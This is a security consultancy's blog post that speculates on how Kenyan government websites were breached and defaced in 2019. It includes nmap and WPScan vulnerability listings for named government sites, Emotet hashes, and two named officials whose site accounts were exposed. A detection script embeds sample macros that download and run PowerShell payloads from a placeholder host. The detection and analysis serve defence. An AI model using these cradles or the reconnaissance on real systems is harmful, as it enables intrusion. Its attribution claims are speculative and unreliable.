Kenyan Government Websites Hacked/Defaced 2019: A Hypothesis On How The Hack Occurred

A superficial look into the hacking event of 1st June 2019, in which at least 18 government (GOK) owned and operated websites were breached and defaced, reveals the level of negligence that floods the Kenyan ICT industry.

By: DigiHut Systems | Published: Tuesday 23rd of July 2019



The Kenyan government has been riddled with cases of corruption in every sector, and that corruption leads to the hiring of incompetent individuals for tasks that are critical to government services. According to a survey conducted by the EACC, bribery, favouritism, nepotism and embezzlement of funds remain the most prevalent forms of corruption in Kenya. The same happened in this case.

Our Hypothesis on How the Attack Occurred

A survey conducted by the Ethics and Anti-Corruption Commission (EACC) in 2016 shows that procurement, finance, public service boards, roads and public works are among the departments most prone to corruption. Procurement of IT services is conducted in the same manner: one has to part with a 'kakitu' (a small bribe) or know someone very prominent to be awarded a tender. Like most hustlers in Kenya, most individuals who purport to be IT experts in this country are merely self-taught web designers or poorly trained ICT graduates of unequipped local colleges. For the most part, they know little or nothing about cybersecurity as it applies to web servers and web applications.


I started my investigation on Tuesday 4th June 2019 at 21:28:14 on behalf of DigiHut Systems, beginning from the domain (belonging to the National Youth Service), which a quick name-server lookup showed resolved to the IP


			Non-authoritative answer:

Further enumeration of the host reveals that the main authors registered on the site are Matayo Odongo, whose LinkedIn profile shows he works at GOK-Kenya as an Information and Communication Technology Officer (ICTO), and Caroline Jomo, whose LinkedIn profile indicates she works as an ICTO at the Ministry of Regional Development Authorities (MORDA).

		[!] 2 users exposed via API:
		| ID | Name          | URL                                       |
		| 3  | matayo odongo | |
		| 4  | caroline jomo | |

Opening the IP directly resolves to the National Government Affirmative Action Fund website, whose URL is (

Now a quick nmap enumeration of likely server folders reveals something interesting... the server is misconfigured, or at least carelessly configured: it serves two different websites depending on the port used to reach it. Addressing the host by bare IP sends no Host header that a name-based virtual host could match, so Apache answers with the default (first-defined) vhost for each port, and here the defaults for 80 and 443 are different sites.

port 80 (http) -> serves the  site, which is Joomla based.

port 443 (https) -> redirects to the defaced version of the National Development Implementation and Technical Communication department (NDITC) site, which is supposed to be a subdomain of the ICT Authority ( served at  and is built on WordPress...

	| => nmap -sV --script=http-enum
Starting Nmap 7.70 ( ) at 2019-06-04 21:30 EAT
Nmap scan report for
Host is up (0.070s latency).
Not shown: 998 closed ports
80/tcp  open  http     Apache httpd (PHP 7.0.32)
| http-enum: 
|   /administrator/: Possible admin folder
|   /administrator/index.php: Possible admin folder
|   /logs/: Logs
|   /robots.txt: Robots file
|   /administrator/manifests/files/joomla.xml: Joomla version 3.8.1
|   /language/en-GB/en-GB.xml: Joomla version 3.8.1
|   /htaccess.txt: Joomla!
|   /README.txt: Interesting, a readme.
|   /bin/: Potentially interesting folder
|   /cache/: Potentially interesting folder
|   /images/: Potentially interesting folder
|   /includes/: Potentially interesting folder
|   /libraries/: Potentially interesting folder
|   /modules/: Potentially interesting folder
|   /templates/: Potentially interesting folder
|_  /tmp/: Potentially interesting folder
|_http-server-header: Apache
443/tcp open  ssl/http Apache httpd (PHP 7.0.32)
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2 
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
|_http-server-header: Apache

Nmap done: 1 IP address (1 host up) scanned in 515.72 seconds

Now I wanted to quit here. Note how to read those http-enum lines, though: the wp-includes checks are file-existence probes, and each of those files first shipped in the release named and is still present in current WordPress, so together they establish a floor of 2.7 rather than an exact release (the /readme.html hit is a separate version string). If the site really was running something that old, that is just plain negligence... but then again it could be that the so-called hackers managed to upload a custom-made website instead of defacing the original one... I mean, that's what I would do... Who has time to modify themes...
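To make that reading of the scan concrete, here is a small parser added for this write-up (it is not part of the original investigation, nor of nmap). It takes the http-enum text quoted above, trimmed to the port banners and fingerprint lines and embedded as a constructed sample, and reports per port which CMS is present and the version the evidence actually supports, marking the WordPress result as a lower bound and the Joomla manifest hit as exact.

```python
import re

# Constructed sample: the http-enum sections from the scan quoted above,
# trimmed to the port banners and the lines that carry CMS fingerprints.
NMAP_OUTPUT = """\
80/tcp  open  http     Apache httpd (PHP 7.0.32)
| http-enum:
|   /administrator/: Possible admin folder
|   /administrator/manifests/files/joomla.xml: Joomla version 3.8.1
|   /language/en-GB/en-GB.xml: Joomla version 3.8.1
|_  /tmp/: Potentially interesting folder
443/tcp open  ssl/http Apache httpd (PHP 7.0.32)
| http-enum:
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|_  /readme.html: Interesting, a readme.
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\b")
# "/path: Joomla version 3.8.1" or "/path: Wordpress version 2.7 found."
# (readme.html yields the bare "Wordpress version: 2" form)
FP_RE = re.compile(r"^\|_?\s+(\S+):\s+(Joomla|Wordpress) version:?\s*(\d+(?:\.\d+)*)")


def version_tuple(v):
    """Numeric component-wise ordering, so '4.10' sorts after '4.9'."""
    return tuple(int(x) for x in v.split("."))


def cms_floor_per_port(text):
    """Map port -> {'cms', 'version', 'exact'} from http-enum output.

    The WordPress checks look for files that first shipped in a given
    release and are still present in current releases, so each hit is a
    lower bound and the strongest bound is the maximum. The Joomla
    manifest (joomla.xml) states the installed version literally, so that
    hit is exact.
    """
    results = {}
    port = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port = int(m.group(1))
            continue
        m = FP_RE.match(line)
        if not m or port is None:
            continue
        path, cms, ver = m.groups()
        cur = results.get(port)
        if cur is None or version_tuple(ver) > version_tuple(cur["version"]):
            results[port] = {
                "cms": cms,
                "version": ver,
                "exact": cms == "Joomla" and path.endswith("joomla.xml"),
            }
    return results


def describe(results):
    """Human-readable lines, flagging floors so they are not read as exact."""
    lines = []
    for port in sorted(results):
        r = results[port]
        if r["exact"]:
            lines.append(f"port {port}: {r['cms']} {r['version']}")
        else:
            lines.append(f"port {port}: {r['cms']} >= {r['version']} "
                         "(lower bound; read /readme.html or the generator meta tag for the exact release)")
    return lines


if __name__ == "__main__":
    print("\n".join(describe(cms_floor_per_port(NMAP_OUTPUT))))
```

The same `version_tuple` comparison matters later when checking plugin releases: comparing version strings lexically would rank 4.9 above 4.10.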

To continue, I did a quick Google search of the parent IP, seeing that the ICT Authority had decided to economise and use a single misconfigured server with a single IP to serve multiple websites. I bet there was little isolation between the websites: unless each vhost runs under its own user (separate php-fpm pools or suEXEC), every site runs as the same web-server account, so a PHP shell dropped in one docroot can read and write all the others, including their wp-config.php database credentials. When one was pwned, all were pwned. That's my first hypothesis so far at least... the question is which vulnerability they exploited...

So I continued the analysis...

I googled the IP...

Now, this was just unbelievable... was hosted on the same server...

Other websites were also hosted on the same server, as shown below.

A complete reverse lookup of the subnet reveals even more interesting results, attached in the file below...

Now for the kicker...

I'll let everyone have some fun first just google or visit my Results and explore...

for those who don't understand the results...

There was an upsurge of malware analyses run against URLs and documents hosted on the web server, most of them flagged as malicious.

The first of these submissions dates back to April 13, 2019, so the server was most likely compromised around that time.

The submissions may have come from two parties:

  1. the hackers checking whether their payloads were detectable or fully undetectable (FUD), as evident from the malware scans;
  2. cybersecurity analysts after the incident occurred.

Now the latter seems more viable, given that owning an account on one of these online malware analysis services can set you back Kshs. 600,000 a year. Reported incidents are from @Spamhaus, an international threat intelligence organisation providing highly trusted real-time actionable data on spam, phishing, botnets and malware sources, and @Cryptolaemus1, a malware/bug hunter.

That's it... my first hypothesis has been confirmed...

I didn't even take an hour...

The attack could not have been targeted, hence I will present only one scenario describing how they got access, how they leveraged the server and why they defaced the websites.

SCENARIO 1: NULLED SCRIPTS (Lucky script kiddie...)

Now, this is more probable and stands as my 2nd hypothesis.

Since the majority of the websites are 'proudly' powered by WordPress, the attackers might not have targeted government websites at all but were merely lucky to land on top government websites running nulled/cracked (and bugged) versions of themes and plugins from popular file-sharing websites such as . This raises concerns regarding the competency of the web developers hired by the GOK to build their websites. Now, this is a viable hypothesis given that I found at least four government and parastatal websites using nulled themes, as shown below.

1. KEMSA website
[+] Name: healthflex - v1.0.0
 |  Location:
 |  Readme:
 |  Changelog:
[!] An error_log file has been found:
 |  Style URL:
 |  Theme Name: HealthFlex (shared on
 |  Theme URI:
 |  Description: Multipurpose Medical WordPress Theme
 |  Author: Plethora Themes
 |  Author URI:
 |  License: GNU General Public License v2 or later
 |  License URI:
 |  Tags: responsive-layout, theme-options, translation-ready
[!] Title: WordPress Slider Revolution Local File Disclosure
[i] Fixed in: 4.1.5

[!] Title: WordPress Slider Revolution Shell Upload
[i] Fixed in: 3.0.96

Since the scripts are nulled, one cannot get the latest versions of the themes/plugins, leaving the server susceptible to publicly available exploit code (mostly proof-of-concept [PoC] code). For instance, the Judicial Service Commission website ( revealed it uses outdated plugins.

[!] Title: LayerSlider 4.6.1 - Style Editing CSRF
[i] Fixed in: 5.2.0

[!] Title: LayerSlider 4.6.1 - Remote Path Traversal File Access
[i] Fixed in: 5.2.0

[!] Title: LayerSlider <= 6.2.0 - CSRF / Authenticated Stored XSS & SQL Injection
[i] Fixed in: 6.2.1

[!] Title: Visual Composer <= 4.7.3 - Multiple Unspecified Cross-Site Scripting (XSS)
[i] Fixed in: 4.7.4

Results from the IFMIS website are even more troubling... the WordPress core itself is outdated, which means it is susceptible to multiple exploits.

[+] WordPress version 3.1.1 identified from stylesheets numbers
 | Released: 2011-04-04
 | Changelog:
[!] 38 vulnerabilities identified from the version number

[!] Title: WordPress 3.1 PCRE Library Remote DoS
[!] Title: WordPress 2.5 - 3.3.1 XSS in swfupload
[!] Title: WordPress 1.5.1 - 3.5 XMLRPC Pingback API Internal/External Port Scanning
[!] Title: WordPress 1.5.1 - 3.5 XMLRPC pingback additional issues
[!] Title: WordPress <= 3.3.2 Cross-Site Scripting (XSS) in wp-includes/default-filters.php
[!] Title: WordPress <= 3.3.2 wp-admin/media-upload.php sensitive information disclosure or bypass
[!] Title: WordPress <= 3.3.2 wp-admin/includes/class-wp-posts-list-table.php sensitive information disclosure by visiting a draft
[!] Title: WordPress 3.0 - 3.6 Crafted String URL Redirect Restriction Bypass
[!] Title: WordPress 2.0.3 - 3.9.1 (except 3.7.4 / 3.8.4) CSRF Token Brute Forcing
[!] Title: WordPress 3.0 - 3.9.1 Authenticated Cross-Site Scripting (XSS) in Multisite
[!] Title: WordPress 3.0-3.9.2 - Unauthenticated Stored Cross-Site Scripting (XSS) 
[!] Title: WordPress <= 4.0 - Long Password Denial of Service (DoS)
[!] Title: WordPress <= 4.0 - Server Side Request Forgery (SSRF)
[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
[!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
[!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
[!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
[!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
[!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
[i] Fixed in: 4.7.1
[!] Title: WordPress <= 4.7 - Post via Email Checks by Default
[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
[!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
[!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
[!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
[!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
[!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
[!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
[!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
[!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
[!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
[!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
[!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion

Now at this point, I was sure I understood how the attacker managed to pwn the server, why he defaced the websites and what his actual intent was.

He exploited a vulnerability in one of the WordPress websites that allowed him to upload a PHP shell, most probably a known shell identifiable by its signature. It was probably generated with weevely, since I highly doubt the attacker is capable of writing his own. Having gained access to the server, the attacker uploaded a Microsoft Office document carrying a macro-based malware downloader of the kind widely shared on darknet forums and also employed by the troublesome Emotet banking malware.

The bugged doc file that was used to deliver the malware was downloadable from I have the actual file from the server in case someone needs it...

The attacker tries to trick the user into allowing macros by placing a message saying one must click "Enable Editing" and "Enable Content" before the document reveals its content. "Enable Editing" takes the document out of Protected View and "Enable Content" runs the macros, which are disabled by default in MS Office precisely because of how often they are abused. Once content is enabled, the document runs a PowerShell command that fetches the download URL (, drops malware on the user's PC and runs it.
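The lure described above has a recognisable shape in the macro source: an auto-run entry point, a call out to a shell, and a PowerShell download cradle, sometimes hidden behind -EncodedCommand (base64 of UTF-16LE text). The detector below is added for this write-up and is not the page's code or a real tool's; both VBA samples are constructed, and the URLs and file names in them are placeholders rather than indicators from the real document.

```python
import base64
import re

# Constructed VBA modelled on the lure described above: an auto-run macro that
# shells out to PowerShell to fetch and execute a second stage. The URL and
# file names are placeholders, not indicators from the real document.
SAMPLE_MACRO = r'''
Private Sub Document_Open()
    Dim cmd As String
    cmd = "powershell -NoP -W Hidden -Exec Bypass -Command ""(New-Object Net.WebClient).DownloadFile('http://example.invalid/wp-content/uploads/stage2.exe','%TEMP%\s.exe'); Start-Process '%TEMP%\s.exe'"""
    CreateObject("WScript.Shell").Run cmd, 0, False
End Sub
'''

# Second constructed variant: the same cradle hidden behind -EncodedCommand,
# which takes base64 of the UTF-16LE command text.
ENCODED_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
SAMPLE_MACRO_ENCODED = (
    "Sub AutoOpen()\n"
    '    Shell "powershell -nop -enc '
    + base64.b64encode(ENCODED_PAYLOAD.encode("utf-16-le")).decode()
    + '", vbHide\n'
    "End Sub\n"
)

AUTO_RUN = re.compile(r"\b(Auto_?Open|Document_Open|Workbook_Open|AutoExec)\b", re.I)
SHELL_CALLS = re.compile(r"\b(WScript\.Shell|ShellExecute|CreateObject|Shell)\b", re.I)
PS_FLAGS = re.compile(r"-(?:NoP\w*|W(?:indowStyle)?\s+Hidden|Exec\w*\s+Bypass|EncodedCommand|enc)\b", re.I)
CRADLE = re.compile(r"\b(DownloadFile|DownloadString|Invoke-WebRequest|iwr|Start-BitsTransfer|Invoke-Expression|iex)\b", re.I)
URL = re.compile(r"https?://[^\s'\"<>)]+", re.I)
ENCODED = re.compile(r"-(?:EncodedCommand|enc|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of UTF-16LE text; return '' if it is not."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyse_macro(src):
    decoded = [d for d in (decode_encoded_command(b) for b in ENCODED.findall(src)) if d]
    # Swap each base64 blob for its plaintext so the rules see the real
    # command rather than the base64 characters.
    text = ENCODED.sub(lambda m: m.group(0).split()[0] + " " + decode_encoded_command(m.group(1)), src)
    return {
        "auto_run": sorted({m.lower() for m in AUTO_RUN.findall(text)}),
        "shell": sorted({m.lower() for m in SHELL_CALLS.findall(text)}),
        "ps_flags": sorted({m.lower() for m in PS_FLAGS.findall(text)}),
        "cradle": sorted({m.lower() for m in CRADLE.findall(text)}),
        "urls": sorted(set(URL.findall(text))),
        "decoded_commands": decoded,
    }


def verdict(report):
    """Auto-run + shell + a download/exec cradle is the classic downloader shape."""
    return bool(report["auto_run"] and report["shell"] and (report["cradle"] or report["ps_flags"]))


if __name__ == "__main__":
    for sample in (SAMPLE_MACRO, SAMPLE_MACRO_ENCODED):
        r = analyse_macro(sample)
        print(verdict(r), r["urls"], r["ps_flags"])
```

The extracted URLs are what you would pivot on: in this incident the second stage sat on a compromised government site, so a web proxy log search for the host and path is the fastest way to find PCs that opened the document.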

Now, like any other hacker out there, the main motivation for hacking is money. The downloader document fetched an executable from the compromised Judiciary website.

The downloaded executable was probably the Emotet banking malware, which sent data from the infected PCs back to  as shown by the report below.

The URL was used as the command-and-control (C2) server, receiving check-ins and delivering commands that allowed further malware to be downloaded onto the user's PC.

First seen Filename Payload (SHA256)
2019-04-27 820069be5c2a0e524297553c96b55b58e1858e4239520f7106d99d72d99967be
2019-04-27 5ca46b89aa0596dba59df9c631d3096247f0cc2b5daa570f64cbf474eff2ba53
2019-04-27 4f38c78c1f006f3759c4c23cf4b7895733197bc51b81a9a6a638b0903a7c1b89
2019-04-27 ff51f78c2935421df0629c134f37385b490069412047cafe363b5b12a065f272
2019-04-27 c8085a7f0595ee94b1a96482c05a84eed62ae58e696bc7016d94f73af867b85b
2019-04-27 55ab5e5298e6cbc1b333a84f0bdf855b76f879a29b0d8e098ecdde588b52baeb
2019-04-27 c3a72df3c50f2278721e9d1b1f0adbc9e0bcec12e586a510eb076f7319d4c768
2019-04-27 16d4662a15cffca403c32dece2a0b22e5f68f3a8215ecfa92efd0cc4f4a6d8ce
2019-04-27 a15c1bb84e207f7f72cc9c35c234902c44caf60f7dfc8a2677b74ec1e9942efa
2019-04-27 3b36ace5b4029c3fbba9cc8061ff2c7acc8131bf756f7f2eb81634de18efddaf
2019-04-27 b4f24969a471a548a4e658b8b4abfb7c0c1dfc324b00f3ac4b779f2b01620784
2019-04-27 2b50d7d5dcf30ebbef59ffe83f1259cc265ccc066768ea82a9401c023ec63f44
2019-04-27 b92da8b8b3c80b89a7c9926747bc8d563b9a7b14b70d72a25937cf605f32c589
2019-04-27 db3b20b4e89eca297b03aff9c79ac820f93bed10e9be45f0ecdc5a924304390d
2019-04-27 8ba6aa3aa099d3f7fdfd53f865c7dc10bfcd09e265207f0e34a4448dd2d32851
2019-04-27 7e5b4db89cfbddb2d784b916dd879a4604a6d16a7d4dd626fd0340117e04bfd7
2019-04-27 054cf228adbe433c3ca8769341a43ae6bb42048951fd4d7cd43c995d60969a01
2019-04-27 edb8ae5ae21559e8146b0037e42d63af84e2b7c2f48ff1940c2b4001ba2ec9a8
2019-04-27 dfc9cc4a6bd5b83f371b19ef2b18c5fcae4f04be8695e663d15bd573a7171c9f
2019-04-27 63b50e7ce93fdab0b95a444d02d907daf74f81056ab94368b3dd4955f8767e0d
2019-04-27 ac7795737e4e5241c90976342a6bee354e2af567f853a9bf2a570b9752691512
2019-04-27 0e8328b3d43dfdac59a19a90e7bd3653553d609119da138340d73f653f8cdfbf
2019-04-27 066a6661fd36554e12d065facb375a2088aca07e2ae5a1ecffa56252ca258336
2019-04-27 6318dc4f090441aead7d4acb91b5b4ce484042d127558c7071d0c4084ae6bfea
2019-04-27 214eced5942bcd5bd6843bfab1182141a75506db774259558fb6c946bbedaec8
2019-04-27 2b1027327de2d9ed79c2853a3acadb63925d36f98b95bd473d0b6bbb9ee321a5
2019-04-27 ee7f7082709691917156416246e6353c6b6fca4e76b6ffa2e7e866be7f7f1489
2019-04-27 8907e1020926056dfd79d477cf5964be83262a2b8972646f551140108b864533
2019-04-26 04f919189a3876ed2bf9816314453eaed9cb4b2adc9c07a2c463b413361ebec2
2019-04-26 d70427f00688eeee7531670750d3c5986efa5696b4e9ba11347e18d44e6521f6
2019-04-26 c61ab072f22c25fff7582807e7018ac903487d4d7ca9c244ddebb924e4a74900
2019-04-26 7f40512543eb30de588f8644ea6f943bf22dce328ee85e4dd12894e3de24fc51
2019-04-26 f015c0b946a1926a27b4b294f4153e79bfc52ad269331ed606c486c0a3f72846
2019-04-26 9d16da900d9c1bbbce1efcd2378ba5457fbdc1a781f222bf6d99c33369c1ca3d
2019-04-26 1725656a6b24195280a084c99487261e0154bfe4eb7c8cc89b65d4dba9639501
2019-04-26 f4ce6ee084f3ca0bf3e0bbff369a166d4984dd7dc8f41b89b7aeff48c16e3e3a
2019-04-26 aadc149340745edc98d54f8186cf6c662ec58ffc5a2b89fdbc8db403052edc0a
2019-04-26 9d99cd5977a02d5f30ee16b4639c94e990f80a8170acbbde30c6a13305fa2422
2019-04-26 77ed29e9c6b4c53f4078f71978755cbb9b1899bbb8e5e94555106e752e40b3a7
2019-04-26 0defa5c0f8de2bb24bdc40ff4d931b60e11a588cca90417f320bfe00569d5003
2019-04-26 cee67757ca0d02787506eccc72f55c4e84529f304b65ebabec344febb2f6c517
2019-04-26 e4583e4e230b9f364df52567ed3d6dac8e52e2310f2439f117d9d11d55942bdc
2019-04-26 5ccca8b1f7bd845a8ec5a79e2abaeaf288113c49efcfc5488c6db3e49d2b2c79
2019-04-26 0a6d9914849c4506b1bd53cafc6affa40c9bf578aeea3bff887691eb84b0e1d2
2019-04-26 2aef6025972a45a0db18ce3d06c25c26bd2356ce3f49b57e795c13240706eb24
2019-04-26 4666910187899ff52b949b35125af4df226803cbe656d723984aa9fd2e01d455
2019-04-26 c1ed7eac4ae69ce8294f88100545b9941113778f7045594ea08230f211353c4b
2019-04-26 4e42d0c617354a24659a547bd1f5eb155953d8fc65a03d260af6ec0f2dd16342
2019-04-26 875bfef2fe7d463be5c334c111939d05a8edb835465bf9db81eb0b2b1d61b31b
2019-04-26 f5f584e0910f3a8783782f00146a402d7b00a7a6b6c497507f37eda997221275
2019-04-26 900bb55b27fc5d1e365f82daf511f2274fbefd0d29c26fe3227382db662e55ed
2019-04-26 209e0cc7acaf75f1b78919d33c7d66f308cb1c5d088bf2d8588106e47a3c99ef
2019-04-26 f61b5d35177fc00dd7e49f47d6efda64cb25c1427615fd1eaa483a3616aed587
2019-04-26 216658c10d876d66737da243659955be12554ce7e5290ba54e329b7a88873e7b
2019-04-26 b09046a6c5e2eb180d24e00b573768d1507bb903c1c05ac9569edee8254e81ad
2019-04-26 143486c325ad5e42c9b8d90c8bc3d1696f97b9c7814758cbc13a09217ea194f9
2019-04-26 df0edbfa7f40d103c957229d2f4a0a32dd45a02137682543d0ac3e5114e09e18
2019-04-26 e5b8f69e063e27e8796bd1d935f74d9b5f24313e76de5bc7dad9708febd99f09
2019-04-26 8c2fa2c978a225e8b04ece69ec2172f8a487a4d155cdd0a9e5d990f867bbe360
2019-04-26 67e18a69327f02613d677ea247b3a1ffa1386addf3cfc5443299ce1b85ad51fc
2019-04-26 fcd62dbf48f60bb8f2575a72e7ef5f6d082ba2370ebf55a3848bad0cdf9cddcd
2019-04-26 e0d2dc6087fe531754b5c20b9eaeaf8afe83cde9d29e01f730950b251d7708b2
2019-04-26 4012dddfc157354f16425471f3875d115143a33785425c19fc0a7cd59640296a
2019-04-25 cebc80294c29b4e05755048e35c38886e7ab27a8689530c05a8ecc3ff33807f2
2019-04-25 2b68c5e2006a8ebf65434d8bed988fb97c47b41a6c1ee22f84dd2c5d2b6f76cb
2019-04-25 3d5f036a7b13afd732e46962862c272979bb7000e127a8b17e42a938584ebf92
2019-04-25 9813bca9eb30519a28edf728999389fb2390779bb17306e268c4b46c100cdc84
2019-04-25 cb2122877fd42a065e9097fd2a59e5e982d8073143f053919a0749c10a43e863
2019-04-25 df87d73a6bc9b56ad6e175667669de268253a6f6bcfadceb53e710d7fb5ce1b1
2019-04-25 c9a700c2039d6714b3ea47584a49fcd276afbd3531fb79fdea21ca7612c8336f
2019-04-25 e2e1734cf70dabc293604f30a667c415dc5504bf2b0834102da3472723ab3c74
2019-04-25 f21d4807cb744df7794adeb6b9473eab6019d1d7616bf6c5d329d7e449daffd1

Each uploaded file contains a different type of information from the victim's PC, as denoted by the letters preceding the hyphen (-). This is a common trick used to trigger follow-on actions in a nested way, i.e. once BG-****.zip is received, do this... etc.

Other URLs used to send and receive commands include:

Date Checked URL
Jun 1, 2019
Jun 1, 2019
May 31, 2019
May 31, 2019
May 31, 2019
May 31, 2019
May 31, 2019
May 31, 2019
May 31, 2019
May 30, 2019
May 30, 2019
May 30, 2019
May 28, 2019
May 25, 2019
May 24, 2019
May 20, 2019
May 13, 2019
May 7, 2019
Apr 29, 2019
Apr 25, 2019
Apr 17, 2019
Apr 8, 2019
Apr 8, 2019

Now the attacker probably thought he would get access to banking credentials. However, he had not done his research well, since most users in Kenya transact through M-Pesa and rarely use online banking. A complete analysis of the Emotet malware can be found on Malwarebytes in case anyone needs to read it...

The Emotet banking malware has numerous capabilities, ranging from opening up Remote Desktop Protocol (RDP) access to stealing stored passwords and keylogging the user's activity.

Now, given that the server was compromised in mid-April, the attacker probably got frustrated with the returns from the banking trojan and decided to make a name for himself in the hacking world by defacing the websites.

My final thoughts...

The hacker codenamed W4R10K, which translates to Warlock (for those unable to read leetspeak), was a solo hacker who just got lucky...

He/she was a simple script kiddie who probably didn't even understand the magnitude of the data he had gained access to. That's why he decided to deface the websites: a show of might among his peers, which means he probably left numerous digital footprints that will lead to his capture, provided the so-called GOK Cyber Security Team is capable of solving the crime... I mean, how long does it take to clone a server and get things up and running while investigations continue... and why do they call themselves the GOK Cyber Security Team given the multiple vulnerabilities GOK websites contain... It's their mandate to conduct regular vulnerability scans and security audits... I mean, how can a government run such servers without an effective intrusion detection and prevention system (IDPS)... such negligence and incompetence. I have no more to say other than: well done W4rl0k, you showed us the true state of GOK cyber security.

Our Cyber Security Consultancy Services

DigiHut Systems offers a range of Vulnerability Assessment, Penetration Testing, Cyber Security Training, Application Development, Physical Security Vulnerability Assessment, and Risk and Mitigation Services to meet your needs. If you still haven't found what you are looking for, kindly reach us to learn more about our services.
